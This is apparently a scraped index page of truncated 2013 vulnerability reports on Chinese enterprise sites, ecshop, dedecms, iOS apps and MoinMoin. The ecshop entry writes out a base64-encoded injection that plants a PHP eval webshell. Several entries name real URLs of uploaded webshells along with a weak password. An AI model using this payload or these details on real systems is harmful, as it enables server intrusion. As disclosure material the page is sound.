File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: ============= You ha...

用友软件开发管理平台IIS写权限导致可获取服务器webshell

简要描述： 见说明 详细说明： http://ufsdp-borrow.ufsoft.com.cn/cmd.asp http://ufsdp-borrow.ufsoft.com.cn/1937cN.txt 漏洞证明：...

用友畅捷服务联盟4S店被上传webshell（shell存在弱口令）

简要描述： 见说明 详细说明： 用友畅捷服务联盟4S店（企通服务）官网 检测过程中检测到一aspx马，弱口令直接进 http://www.uftong.com/Admin/ManagerTestimony/ftb.image.aspx 密码admin --! 漏洞证明：...

用友研发实践共享平台遍历漏洞发现存在webshell（IIS解析漏洞）

简要描述： 见说明 详细说明： http://ufsdp-zjsj.ufida.com.cn/index.aspx 遍历漏洞地址http://ufsdp-zjsj.ufida.com.cn/files/ 在这个页面发现有前辈留下的痕迹，顺藤摸瓜，找到了前辈Fck上传后其中一个未解析完整的马，得到一句话密码为 利用前辈铺好的路，直接菜刀连接 http://ufsdp-zjsj.ufida.com.cn/files/s.asp;.jpg 漏洞证明：...

用友软件IIS写权限(PUT)导致可获取webshell控制服务器

简要描述： 1年后，用友再次爆动，菜鸟一枚，只会put,wooyun那些屌丝中的神级BOOS就莫喷了，绕道吧!听说可以换QB了，主要上来弄QB的.穷屌丝就这点追求了 详细说明： http://summit.ufida.com/ 2012年8月份检测过一次，存在，现在又来了，呵呵 PUT，大家懂得！ WooYun: 用友分站漏洞利用入侵 漏洞为什么依然存在？ 漏洞证明：...

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary PHP is a very popular Web development language on the Internet many Web applications are using PHP development. And in the use of PHP development of Web applications, PHP file include vulnerability is a Common Vulnerability. The use of PHP file include vulnerabilities intrusion website is...

php LFI to read the php file source code as well as directly post webshell-vulnerability warning-the black bar safety net

Recently in the busy defcon topic training where a set of topics where there is a foreigner to write it is mentioned in the LFI, another tips The original text please refer to the PS: the skill is not a new technology bull God has certainly been with got bored, so when passing on the line =,= I...

ecshop最新补丁含有webshell，请各位站长注意！

简要描述： ecshop最新（2013年5月6日）补丁含有后门，请各位站长注意！补丁地址http://bbs.ecshop.com/viewthread.php?tid=1129622 下载过的请及时处理。同时希望官方以公告方式告知！ 详细说明： 官方已经停止了补丁的下载。我是从第三方 下载的补丁ecmoban.com下载的补丁 我开始以为是第三方故意写的后门于是联系了 ecmoban的人员。确定是ec论坛被挂马导致的 shell位置...

ecshop后台拿weshell

简要描述： ecshop后台拿webshell 详细说明： 模板管理--语言项编辑 如:user.php 搜索:状态 插入$$fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4 访问http://localhost/ecshop/languages/zhcn/user.php 一句话:http://localhost/ecshop/languages/zhcn/fuck.php 漏洞证明：...

[jSQL Injection v0.4] Java tool for automatic database injection

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform Windows, Linux, Mac OS X, Solaris. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic...

Meng Jie home textile jboss configuration improper has been invaded many times-the vulnerability and early warning-the black bar safety net

Estimated you also have seen, just haven't submitted. Supposedly now is a positive card manufacturers, the author fixes it. Detailed description: Information leak: http://amb.mendale.com.cn/status?full=true From the figure we can see that in my screenshot, still someone in to access the...

cmseasy{easy through CMS}v5. 5 arbitrary file upload vulnerability in the simple analysis of reference using the method-vulnerability warning-the black bar safety net

Yesterday found someone storm out of a cmseasy v5. 5 arbitrary file upload vulnerability, it also comes with the exp. Exploit the vulnerability can directly Upload a webshell and other malicious files, the harm is huge and currently the official has not been any patches here to do some simple...

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities Title: ====== Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities Date: ===== 2013-04-21 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=932 VL-ID: ===== 932 Common Vulnerability Scoring System:...

File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities

Title: ====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: =============...

金蝶网站可执行任意命令，root权限

简要描述： 金蝶网站可执行任意命令，root权限。 详细说明： 金蝶网站用户登录的地方http://id.kingdee.com/存在命令执行漏洞，借助struts2的私有变量class.classLoader.jarPath可以执行任意命令（并且是root权限），很可能获得webshell（当然我没有尝试获取），进而可能威胁到用户的数据安全。因为是以root权限执行任意命令，可获得服务器完全控制权，并且可能以这台服务器为跳板威胁周围其它服务器的安全。 漏洞证明： 用IE浏览器访问如下链接：...

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

Document Title: =============== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=939 Release Date: ============= 2013-05-04 Vulnerability Laboratory ID VL-ID: ====================================...

Hornbill Supportworks ITSM 1.0.0 - SQL Injection

Summary SQL Injection Vulnerability in ITSM component of Hornbill Supportworks Application CVE number: CVE-2013-2594 Impact: High Vendor homepage: http://www.hornbill.com Vendor notified: 19/11/2012 Vendor response: This issue has reportedly been fixed but the vendor refused to give version...